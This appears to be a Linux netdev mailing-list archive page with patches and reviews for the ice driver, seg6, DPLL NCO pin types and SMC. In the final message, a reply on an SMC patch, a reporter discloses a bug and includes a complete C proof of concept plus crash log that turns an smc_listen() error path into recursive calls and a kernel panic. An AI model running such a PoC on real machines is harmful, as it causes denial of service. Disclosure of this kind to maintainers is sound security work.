	pabeni, Jose Ignacio Tornos Martinez
In-Reply-To: <20260623101800.991293-1-jtornosm@redhat.com>

Similar to the i40e fix, ice_set_vf_trust() unconditionally calls
ice_reset_vf() when the trust setting changes. While the delay is smaller
than i40e, this reset is still unnecessary in most cases.

When granting trust, no reset is needed - we can just set the capability
flag to allow privileged operations.

When revoking trust, we only need to reset (conservative approach) if
the VF has actually configured advanced features that require cleanup
(MAC LLDP filters, promiscuous mode). For VFs in a clean state, we can
safely change the trust setting without the disruptive reset.

When we do reset, we maintain the original ice pattern that has been
reliable in production: cleanup LLDP filters first, then set vf->trusted,
then reset. This ensures the privilege capability bit is handled correctly
during reset rebuild.

When we don't reset, we manually handle the capability flag via helper
function, eliminating the delay.

Signed-off-by: Jose Ignacio Tornos Martinez <jtornosm@redhat.com>
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
---
v7: Rebase on current net tree (no code changes from v6)
v6: https://lore.kernel.org/all/20260619061321.8554-5-jtornosm@redhat.com/

 drivers/net/ethernet/intel/ice/ice_sriov.c | 33 +++++++++++++++++++---
 1 file changed, 29 insertions(+), 4 deletions(-)

diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
index 7e00e091756d..XXXXXXXXXXXXXXXX 100644
--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
+++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
@@ -1364,6 +1364,23 @@ int ice_set_vf_mac(struct net_device *netdev, int vf_id, u8 *mac)
 	return __ice_set_vf_mac(ice_netdev_to_pf(netdev), vf_id, mac);
 }

+/**
+ * ice_setup_vf_trust - Enable/disable VF trust mode without reset
+ * @vf: VF to configure
+ * @setting: trust setting
+ *
+ * Update VF flags when changing trust without performing a VF reset.
+ * This is only called when it's safe to skip the reset (VF has no advanced
+ * features configured that need cleanup).
+ */
+static void ice_setup_vf_trust(struct ice_vf *vf, bool setting)
+{
+	if (setting)
+		set_bit(ICE_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+	else
+		clear_bit(ICE_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+}
+
 /**
  * ice_set_vf_trust
  * @netdev: network interface device structure
@@ -1399,11 +1416,19 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)

 	mutex_lock(&vf->cfg_lock);

-	while (!trusted && vf->num_mac_lldp)
-		ice_vf_update_mac_lldp_num(vf, ice_get_vf_vsi(vf), false);
-
+	/* Reset only if revoking trust and VF has advanced features configured */
+	if (!trusted &&
+	    (vf->num_mac_lldp > 0 ||
+	     test_bit(ICE_VF_STATE_UC_PROMISC, vf->vf_states) ||
+	     test_bit(ICE_VF_STATE_MC_PROMISC, vf->vf_states))) {
+		while (vf->num_mac_lldp)
+			ice_vf_update_mac_lldp_num(vf, ice_get_vf_vsi(vf), false);
+		vf->trusted = trusted;
+		ice_reset_vf(vf, ICE_VF_RESET_NOTIFY);
+	} else {
+		vf->trusted = trusted;
+		ice_setup_vf_trust(vf, trusted);
+	}
-	vf->trusted = trusted;
-	ice_reset_vf(vf, ICE_VF_RESET_NOTIFY);
 	dev_info(ice_pf_to_dev(pf), "VF %u is now %strusted\n",
 		 vf_id, trusted ? "" : "un");

--
2.43.0


^ permalink raw reply

* Re: [PATCH iwl-net] ice: clear the default forwarding VSI rule when releasing a VSI
From: Simon Horman @ 2026-06-23 10:29 UTC (permalink / raw)
  To: poros
  Cc: Simon Horman, netdev, anthony.l.nguyen, przemyslaw.kitszel,
	andrew+netdev, davem, edumazet, kuba, pabeni, jacob.e.keller,
	michal.swiatkowski, intel-wired-lan, linux-kernel
In-Reply-To: <20260622081030.2312129-1-poros@redhat.com>

This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
---
ice: clear the default forwarding VSI rule when releasing a VSI

This patch restores the cleanup of the default forwarding VSI rule
in ice_vsi_release(), clearing it when the VSI owns it. This prevents
a rule leak if a trusted VF enters promiscuous mode and is then destroyed.

> diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
> --- a/drivers/net/ethernet/intel/ice/ice_lib.c
> +++ b/drivers/net/ethernet/intel/ice/ice_lib.c
> @@ -2871,6 +2871,9 @@ int ice_vsi_release(struct ice_vsi *vsi)
>  		return -ENODEV;
>  	pf = vsi->back;
>  
> +	if (ice_is_vsi_dflt_vsi(vsi))
> +		ice_clear_dflt_vsi(vsi);
> +

[Severity: High]
Is there a time-of-check to time-of-use race here?

ice_is_vsi_dflt_vsi() acquires and releases the filt_rule_lock to check if
the current VSI is the default. If true, ice_clear_dflt_vsi() is called,
which acquires the lock again during rule removal.

If the lock is dropped between these two calls, could another thread
establish a new default VSI rule before ice_clear_dflt_vsi() runs?

When ice_clear_dflt_vsi() executes, it appears the rule search only matches
by l_data and flag:

ice_switch.c:ice_find_rule_entry() {
	if (!memcmp(&f_info->l_data, &list_itr->fltr_info.l_data,
		    sizeof(f_info->l_data)) &&
	    f_info->flag == list_itr->fltr_info.flag) {
        ...
}

For the default VSI rule, l_data is empty, so it might match any newly
established default rule.

And since ice_remove_rule_internal() does not appear to validate the
vsi_handle for non-list rules:

ice_switch.c:ice_remove_rule_internal() {
	if (list_elem->fltr_info.fltr_act != ICE_FWD_TO_VSI_LIST) {
		remove_rule = true;
        ...
}

Could this blindly remove the default forwarding configuration for a
completely unrelated VSI?

>  	if (test_bit(ICE_FLAG_RSS_ENA, pf->flags))
>  		ice_rss_clean(vsi);

^ permalink raw reply

* [PATCH net v2] seg6: validate SRH length before reading fixed fields
From: Nuoqi Gui @ 2026-06-23 10:32 UTC (permalink / raw)
  To: David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Simon Horman, Andrea Mayer
  Cc: netdev, bpf, linux-kernel, Nuoqi Gui, Mathieu Xhonneux,
	Daniel Borkmann, David Lebrun

seg6_validate_srh() reads fixed SRH fields such as srh->type and
srh->hdrlen before checking that the supplied length covers the fixed
struct ipv6_sr_hdr fields.

The BPF SEG6 encap path reaches this with a BPF program-supplied pointer
and length: bpf_lwt_push_encap() and the SEG6 local BPF END_B6 and
END_B6_ENCAP actions call bpf_push_seg6_encap(), which forwards the
length to seg6_validate_srh() with no minimum-size guard.  A 2-byte SEG6
encap header can therefore make the validator read srh->type at offset 2
beyond the caller-supplied buffer.

Reject lengths shorter than the fixed SRH at the top of
seg6_validate_srh(), before any field is read.  This fixes the BPF helper
path and keeps the common validator robust.

Fixes: fe94cc290f53 ("bpf: Add IPv6 Segment Routing helpers")
Signed-off-by: Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>
---
Changes in v2:
- Narrowed the commit message to the BPF encap callers that can supply a
  too-short SRH length.
- Dropped the unnecessary cast in the minimum SRH length check.
- Link to v1: https://patch.msgid.link/20260620-f01-17-seg6-srh-len-v1-1-36cbb29c12f1@mails.tsinghua.edu.cn

To: Andrea Mayer <andrea.mayer@uniroma2.it>
To: "David S. Miller" <davem@davemloft.net>
To: Eric Dumazet <edumazet@google.com>
To: Jakub Kicinski <kuba@kernel.org>
To: Paolo Abeni <pabeni@redhat.com>
To: Simon Horman <horms@kernel.org>
To: Mathieu Xhonneux <m.xhonneux@gmail.com>
To: Daniel Borkmann <daniel@iogearbox.net>
To: David Lebrun <dlebrun@google.com>
Cc: netdev@vger.kernel.org
Cc: linux-kernel@vger.kernel.org
Cc: bpf@vger.kernel.org
---
 net/ipv6/seg6.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
index 1c3ad25700c4c..62a7eb7792026 100644
--- a/net/ipv6/seg6.c
+++ b/net/ipv6/seg6.c
@@ -29,6 +29,9 @@ bool seg6_validate_srh(struct ipv6_sr_hdr *srh, int len, bool reduced)
 	int max_last_entry;
 	int trailing;
 
+	if (len < sizeof(*srh))
+		return false;
+
 	if (srh->type != IPV6_SRCRT_TYPE_4)
 		return false;
 

---
base-commit: 96e7f9122aae0ed000ee321f324b812a447906d9
change-id: 20260619-f01-17-seg6-srh-len-a85f35427e0b

Best regards,
--  
Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>


^ permalink raw reply related

* Re: [PATCH net-next v5 1/4] dpll: add DPLL_PIN_TYPE_INT_NCO pin type
From: Jiri Pirko @ 2026-06-23 10:37 UTC (permalink / raw)
  To: Ivan Vecera
  Cc: Kubalewski, Arkadiusz, Vadim Fedorenko, Jakub Kicinski,
	netdev@vger.kernel.org, Jiri Pirko, David S. Miller,
	Donald Hunter, Eric Dumazet, Schmidt, Michal, Paolo Abeni,
	Vaananen, Pasi, Oros, Petr, Prathosh Satish, Simon Horman,
	linux-kernel@vger.kernel.org
In-Reply-To: <23e47140-f69f-451d-9154-29071130c11c@redhat.com>

Fri, Jun 19, 2026 at 07:07:52PM +0200, ivecera@redhat.com wrote:
>On 6/17/26 1:59 PM, Kubalewski, Arkadiusz wrote:
>> > From: Ivan Vecera <ivecera@redhat.com>
>> > Sent: Monday, June 15, 2026 2:00 PM
>> > 
>> > On 6/11/26 2:09 PM, Jiri Pirko wrote:
>> > > Wed, Jun 10, 2026 at 05:45:46PM +0200, ivecera@redhat.com wrote:
>> > > > On 6/10/26 3:04 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > Sent: Tuesday, June 9, 2026 4:59 PM
>> > > > > > 
>> > > > > > On 6/9/26 4:00 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > > > From: Jiri Pirko <jiri@resnulli.us>
>> > > > > > > > Sent: Tuesday, June 9, 2026 10:51 AM
>> > > > > > > > 
>> > > > > > > > Mon, Jun 08, 2026 at 07:03:46PM +0200,
>> > > > > > > > arkadiusz.kubalewski@intel.com
>> > > > > > > > wrote:
>> > > > > > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > > > > > Sent: Monday, June 8, 2026 5:48 PM
>> > > > > > > > > > 
>> > > > > > > > > > On 6/8/26 4:43 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > > > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > > > > > > > Sent: Sunday, May 31, 2026 9:44 PM ...
>> > > > > > > > > > > >            -
>> > > > > > > > > > > >              name: gnss
>> > > > > > > > > > > >              doc: GNSS recovered clock
>> > > > > > > > > > > > +      -
>> > > > > > > > > > > > +        name: int-nco
>> > > > > > > > > > > > +        doc: |
>> > > > > > > > > > > > +          Device internal numerically controlled oscillator.
>> > > > > > > > > > > > +          When connected as a DPLL input, the DPLL enters NCO
>> > > > > > > > > > > > mode
>> > > > > > > > > > > > +          where the output frequency is adjusted by the host
>> > > > > > > > > > > > via
>> > > > > > > > > > > > +          the PTP clock interface.
>> > > > > > > > > > > 
>> > > > > > > > > > > Hi Ivan!
>> > > > > > > > > > > 
>> > > > > > > > > > > How would you control this in case of automatic mode dpll?
>> > > > > > > > > > > Automatic mode DPLL shall be controlled on HW level, such pin
>> > > > > > > > > > > brakes that rule and requires some driver magic to show it is
>> > > > > > > > > > > higher priority then the rest of the pins?
>> > > > > > > > > > 
>> > > > > > > > > > The NCO pin can be connected only in manual mode. In other words
>> > > > > > > > > > a
>> > > > > > > > > > DPLL in automatic mode cannot select NCO pin (switch to NCO mode)
>> > > > > > > > > > by
>> > > > > > > > > > its own.
>> > > > > > > > > > 
>> > > > > > > > > 
>> > > > > > > > > Being picky on DPLL_MODE for enabling feature is not something we
>> > > > > > > > > can allow if it is not related to HW limitation, is it?
>> > > > > > > > > Could you please elaborate why it is not possible for AUTOMATIC
>> > > > > > > > > mode?
>> > > > > > > > 
>> > > > > > > > In automatic mode, the pin selection logic is defined upon prio. I
>> > > > > > > > can imagine that if NCO pin has the highest prio of the available
>> > > > > > > > ones, it gets picked. I would be aligned 100% with automatic mode
>> > > > > > > > behaviour.
>> > > > > > > > Is there a real usecase for it?
>> > > > > > > > 
>> > > > > > > > [..]
>> > > > > > > 
>> > > > > > > This is not true. AUTOMATIC mode is HW solution, SW driver ONLY
>> > > > > > > configures priorities on the inputs, not manages the active inputs.
>> > > > > > > This brakes that behavior, the SW driver would have to manually
>> > > > > > > override the AUTMATIC mode to be fed from such NCO pin as it doesn't
>> > > > > > > exists on it's priority list, HW cannot pick or use it.
>> > > > > > 
>> > > > > > Correct, AUTO mode is hardware feature and it should not be emulated
>> > > > > > by a
>> > > > > > driver. If the hardware does not support it then the switching
>> > > > > > between
>> > > > > > input references should be done by userspace (by monitoring ffo,
>> > > > > > phase_offset, operstate).
>> > > > > > 
>> > > > > 
>> > > > > Yes, exactly, so for AUTOMATIC mode HW it will not be possible to
>> > > > > create
>> > > > > such pin, which means that NCO pin would serve only a MANUAL mode
>> > > > > implementation.
>> > > > > Basically this is something we shall not allow to happen. DPLL API
>> > > > > should be designed to cover the case where AUTO mode is able to
>> > > > > implement
>> > > > > all features consistently.
>> > > > 
>> > > > If you don't like the proposal from Jiri (NCO switch driven by NCO pin
>> > > > priority -> highest==enter_nco else leave_nco) then it could be
>> > > > possible
>> > > > to handle the switching by allowing the state 'connected' in AUTO mode
>> > > > for the NCO pin type. Then the implementation will be the same for both
>> > > > selection modes.
>> > > > 
>> > > > Only difference would be that a user does not need to switch the device
>> > > >from the AUTO to MANUAL mode.
>> > > > 
>> > > > > > > The real use case is that any DPLL can switch the mode to this one
>> > > > > > > instead of implementing MANUAL mode just to use the feature with a
>> > > > > > > 'virtual' pin.
>> > > > > > 
>> > > > > > I don't expect this... but it is up to a driver. I don't plan such
>> > > > > > functionality in zl3073x as the NCO pin does not expose prio_get()
>> > > > > > and
>> > > > > > prio_set() callbacks - so it is clear that this pin cannot be part of
>> > > > > > the
>> > > > > > automatic selection.
>> > > > > > 
>> > > > > > Ivan
>> > > > > 
>> > > > > There is a difference between particular HW and API capabilities, with
>> > > > > the
>> > > > > proposed API we would disallow the possibility of such implementation
>> > > > > for
>> > > > > existing HW variants.
>> > > > > 
>> > > > > DPLL NCO MODE would allow that but as pointed here by Ivan and by Jiri
>> > > > > in
>> > > > > the other email it would also require the extra implementation for
>> > > > > some
>> > > > > configuration - device level phase/ffo handling.
>> > > > > 
>> > > > > To summarize it all, I don't have such simple solution for it.
>> > > > > 
>> > > > > First thing that comes to my mind is to combine both approaches.
>> > > > > Make it possible for AUTMATIC mode to also set "CONNECTED" state
>> > > > > on certain kind of "OVERRIDE" pins, where it could be determined by
>> > > > > the type of PIN and embed that logic into the DPLL subsystem.
>> > > > 
>> > > > The possible states for particual pins are now handled at a driver
>> > > > level
>> > > > so the driver decides if the requested state is correct or not. So it
>> > > > could be easy to implement this.
>> > > > 
>> > > > For auto mode allowed states:
>> > > > - input references: selectable / disconnected
>> > > > - nco pin: connected / disconnected
>> > > > 
>> > > > > Basically, if driver registers such NCO pin it would be always
>> > > > > selected
>> > > > > manually, and in such case all the other pins are going to
>> > > > > disconnected
>> > > > > state while DPLL mode is also a "OVERRIDE" or something like it.
>> > > > 
>> > > > I would leave this decision on the driver level... Imagine the
>> > > > potential
>> > > > HW that would allow to switch NCO mode if there is no valid input
>> > > > reference.
>> > > > 
>> > > > Example:
>> > > > 
>> > > > REF0 (prio 0) -> +------+ -> OUT0
>> > > > REF1 (prio 1) -> | DPLL | -> ...
>> > > > NCO  (prio 2) -> +------+ -> OUTn
>> > > > 
>> > > > Such HW would prefer REF0 or REF1 and lock to one of them if they are
>> > > > qualified. But if they are NOT, then it switches to NCO mode.
>> 
>> Now you said yourself "NCO mode" ... I agree that it would be a mode in
>> that case. Where instead of running on regular/built in XO dpll would run
>> on NCO and user could select it, and this would be addition to regular
>> behavior.
>> 
>> I also agree that the pin approach might be better/easier to use, assuming
>> frequency offset for all the outputs given dpll drives, it makes more sense
>> to have it configurable on input side.
>
>+1
>
>> > > > 
>> > > > In this situation the relevant driver would allow to configure priority
>> > > > and state 'selectable' for this NCO pin.
>> > > > 
>> > > > > Perhaps the pin type could include OVERRIDE in it's name to make it
>> > > > > less
>> > > > > confusing and needs some extra documentation.
>> > > > > 
>> > > > > Thoughts?
>> > > > I think _INT_ is ok. In the case of TYPE_INT_OSCILLATOR it is also
>> > > > obvious that it is not a standard input reference.
>> > > > 
>> > > > Jiri, Vadim, Arek, thoughts?
>> > > 
>> > > I agree with you, the driver should have the flexibility to implement
>> > > this according to his/hw's needs/capabilities. If it implements prio
>> > > selection in AUTO mode, let it have it. If it implements manual NCO pin
>> > > selection in AUTO mode using connected/disconnected override, let it
>> > > have it.
>> 
>> I don't know 'current' HW that is capable of using AUTO mode as a part of
>> HW-based priority source selection and use such NCO input..
>> But as already explained above, this is special mode of regular XO, which
>> allows DPLL's output frequency offset configuration.
>
>Lets keep this available for potential future HW. I can imagine a
>situation where a user will prefer an automatic switch to NCO mode
>if there is no qualified input reference - automatic switch means
>that HW will support this (not emulated by the driver).
>
>> > > 
>> > > Moreover, I actually like the "override" capability for pins in AUTO
>> > > mode in general. It may be handy for other usecases as well.
>> > > 
>> > Arek? Vadim?
>> > 
>> > Thanks,
>> > Ivan
>> 
>> Agree, 'override' capability of a pin would be the way to go for this and
>> other similar further cases.
>> 
>> I believe a single approach on this would be best, I mean if AUTO mode
>> needs a capability, to switch from regular behavior to 'OVERRIDE', and
>> 'OVERRIDE' is only pin capability that allows such behavior for AUTO
>> mode, then similar approach should be used on MANUAL mode, to make
>> userspace know that such pin is always available to set "CONNECTED"
>> and make the userspace implementation consistent on enabling it no matter
>> if AUTO or MANUAL mode dpll.
>
>Proposal:
>1) new pin capability
>   - name: state-connected-override
>   - doc: pin state can be changed to connected in any DPLL mode

Needs a bit more description I think in real patch.


>
>2) new NCO pin type to switch the DPLL to NCO mode when connected

Say "NCO hw mode" to avoid confusion (I already spotted such a bit
earlier in this thread)


>
>3) automatic-only DPLL
>   - should expose NCO pin with state-connected-override capability
>
>4) manual-only DPLL
>  - does not need to expose NCO pin with state-connected-override cap
>
>5) dual-mode DPLL (supporting mode switching)
>  - if it exposes NCO pin with the override cap then it has to support
>    switching to NCO mode directly from AUTO mode
>  - if does not expose NCO pin with the override cap then a user MUST
>    switch the DPLL mode from AUTO to MANUAL to be able to make NCO
>    pin connected to the DPLL
>
>Vadim, Jiri, Arek - thoughts?

Agreed.

>
>Thanks,
>Ivan
>

^ permalink raw reply

* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready
From: XIAO WU @ 2026-06-23 10:38 UTC (permalink / raw)
  To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
	David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
  Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
	linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable
In-Reply-To: <20260619054815.176764-1-runyu.xiao@seu.edu.cn>

Hi Runyu,

Thanks for this patch.

 > diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
 > index 6421c2e1c84d..1af4e3c333ff 100644
 > --- a/net/smc/af_smc.c
 > +++ b/net/smc/af_smc.c
 > @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock 
*listen_clcsock)
 >  {
 >      struct smc_sock *lsmc;
 >
 > +    if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
 > +        return;
 > +
 >      read_lock_bh(&listen_clcsock->sk_callback_lock);
 >      lsmc = smc_clcsock_user_data(listen_clcsock);

The TCP_LISTEN check before taking sk_callback_lock looks correct and
mirrors the same pattern from nvmet TCP.

Sashiko AI review also looked at this patch and flagged a separate
pre-existing issue nearby — the error path in smc_listen() does not
restore icsk_af_ops when kernel_listen() fails:

https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@seu.edu.cn

The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704):

         smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops;

         smc->af_ops = *smc->ori_af_ops;
         smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock;

         inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops;

         if (smc->limit_smc_hs)
                 tcp_sk(smc->clcsock->sk)->smc_hs_congested = 
smc_hs_congested;

         rc = kernel_listen(smc->clcsock, backlog);
         if (rc) {
write_lock_bh(&smc->clcsock->sk->sk_callback_lock);
smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready,
  &smc->clcsk_data_ready);
                 rcu_assign_sk_user_data(smc->clcsock->sk, NULL);
write_unlock_bh(&smc->clcsock->sk->sk_callback_lock);
                 goto out;
         }

The error path restores sk_data_ready and sk_user_data but leaves
icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already
set to smc_tcp_syn_recv_sock).  I verified this in a QEMU VM and can
confirm it triggers a real kernel stack overflow.

=== Reproduction ===

Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y)
QEMU: qemu-system-x86_64 -m 2G -smp 2

Trigger sequence:
   1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P
      → clcsock gets SO_REUSEADDR via smc_bind() copy
   2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P
      → Both non-TCP_LISTEN at bind time → bind OK
      → C enters TCP_LISTEN after its listen()
   3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE
      → icsk_af_ops NOT restored → clcsock points to wrapper
   4. Close TCP C (free port), listen(A) again → succeeds
      → ori_af_ops now points to wrapper with syn_recv_sock = 
smc_tcp_syn_recv_sock
   5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself
      → infinite recursion → IRQ stack guard page hit → kernel panic

=== Full PoC ===

Compile with: gcc -o poc poc.c -static

// PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#ifndef PF_SMC
#define PF_SMC 43
#endif
#ifndef SMCPROTO_SMC
#define SMCPROTO_SMC 0
#endif

int main(void)
{
     int smc_a, tcp_c, client;
     struct sockaddr_in addr;
     pid_t child;
     int status, ret;
     socklen_t len;
     int val;

     printf("=== SMC listen error path -> stack overflow PoC ===\n\n");

     /* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */
     printf("[1] Create SMC socket A with SO_REUSEADDR\n");
     smc_a = socket(PF_SMC, SOCK_STREAM, 0);
     if (smc_a < 0) { perror("smc socket"); return 1; }
     val = 1;
     setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));

     memset(&addr, 0, sizeof(addr));
     addr.sin_family = AF_INET;
     addr.sin_addr.s_addr = htonl(INADDR_ANY);
     addr.sin_port = 0;
     if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
         perror("bind smc_a"); close(smc_a); return 1;
     }
     len = sizeof(addr);
     if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) {
         perror("getsockname"); close(smc_a); return 1;
     }
     int port = ntohs(addr.sin_port);
     printf("  SMC A bound to port %d\n", port);

     /* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */
     printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port);
     tcp_c = socket(AF_INET, SOCK_STREAM, 0);
     val = 1;
     setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val));
     memset(&addr, 0, sizeof(addr));
     addr.sin_family = AF_INET;
     addr.sin_addr.s_addr = htonl(INADDR_ANY);
     addr.sin_port = htons(port);
     if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
         perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1;
     }
     if (listen(tcp_c, 5) < 0) {
         perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1;
     }
     printf("  TCP C listening on port %d\n", port);

     /* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */
     printf("[3] listen(SMC A) — expect failure... ");
     fflush(stdout);
     ret = listen(smc_a, 5);
     if (ret == 0) {
         printf("succeeded! Unexpected.\n");
         close(tcp_c); close(smc_a);
         return 1;
     }
     printf("failed: %s\n", strerror(errno));

     /* Step 4: Close TCP C to free the port */
     printf("[4] Close TCP C to free port %d\n", port);
     close(tcp_c);
     sleep(1);

     /* Step 5: listen(A) again → succeeds but ori_af_ops is 
self-referential */
     printf("[5] listen(SMC A) again... ");
     fflush(stdout);
     ret = listen(smc_a, 5);
     if (ret < 0) {
         printf("failed: %s, retrying...\n", strerror(errno));
         sleep(2);
         ret = listen(smc_a, 5);
     }
     if (ret < 0) {
         perror("retry"); close(smc_a); return 1;
     }
     printf("succeeded! ori_af_ops->syn_recv_sock == 
smc_tcp_syn_recv_sock\n");

     /* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK 
OVERFLOW */
     printf("[6] TCP connect → triggers infinite recursion...\n");
     fflush(stdout);

     child = fork();
     if (child == 0) {
         client = socket(AF_INET, SOCK_STREAM, 0);
         if (client < 0) exit(1);
         memset(&addr, 0, sizeof(addr));
         addr.sin_family = AF_INET;
         addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
         addr.sin_port = htons(port);
         if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
             perror("connect");
             exit(1);
         }
         sleep(3);
         close(client);
         exit(0);
     }

     printf("Waiting for crash...\n");
     sleep(5);
     if (waitpid(child, &status, WNOHANG) == 0) {
         printf("Child still alive — check dmesg\n");
         kill(child, SIGKILL);
         waitpid(child, NULL, 0);
     }
     close(smc_a);
     return 0;
}

=== Crash Log ===

Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64
(CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y)

[ 1453.562682][    C0] BUG: IRQ stack guard page was hit at 
ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000)
[ 1453.562712][    C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI
[ 1453.562733][    C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 
7.1.0-rc7-gfa471042f07a #1 PREEMPT(full)
[ 1453.562756][    C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 
2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 1453.562767][    C0] RIP: 0010:__lock_acquire+0x417/0x2730
[ 1453.562965][    C0] Call Trace:
[ 1453.562970][    C0]  <IRQ>
[ 1453.562980][    C0]  lock_acquire+0x1ae/0x360
[ 1453.562995][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563031][    C0]  smc_tcp_syn_recv_sock+0xbf/0xb10
[ 1453.563051][    C0]  ? smc_tcp_syn_recv_sock+0xab/0xb10
[ 1453.563073][    C0]  ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10
[ 1453.563114][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563158][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563200][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
                         [... 15+ recursive frames ...]
[ 1453.564373][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][    C0]  smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][    C0] RIP: 0033:0x423574
[ 1453.577319][    C0] Kernel panic - not syncing: Fatal exception in 
interrupt

The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.

Thanks,
Xiao



^ permalink raw reply

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox